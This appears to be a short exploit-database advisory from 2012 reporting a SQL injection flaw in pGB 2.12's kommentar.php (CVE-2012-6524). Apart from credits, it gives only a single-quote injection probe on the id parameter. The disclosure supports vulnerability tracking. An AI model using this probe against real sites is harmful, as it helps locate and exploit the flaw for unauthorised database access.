pGB 2.12 - 'kommentar.php' SQL Injection

Author: 3spi0n
type: webapps
platform: php
port: 
date_added: 2012-01-18 
date_updated: 2012-01-18 
verified: 1 
codes: OSVDB-78342;CVE-2012-6524 
tags: 
aliases:  
screenshot_url:  
application_url: 

# Exploit Title: pGB 2.12 SQL Injection Vulnerability
# Date: 18/01/2012 - 03.52
# Author: 3spi0n
# Software Website: http://www.powie.de/
# Tested On: BackTrack 5 - Win7 Ultimate
# Platform: Php
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
[$] Vulnerable File:

[~] kommentar.php

[$] Demo Sites:

[~] http://server/kommentar.php?id=117'
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

# Dar bi Koridor Benimki, Kendimi Aradigim.

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

# Contact: Twitter.Com/RigidusCO - Facebook.Com/3spi0ne

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

- Mr.PaPaRoSSe And 3spi0n -

Bug Researcher Group - TURKEY

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>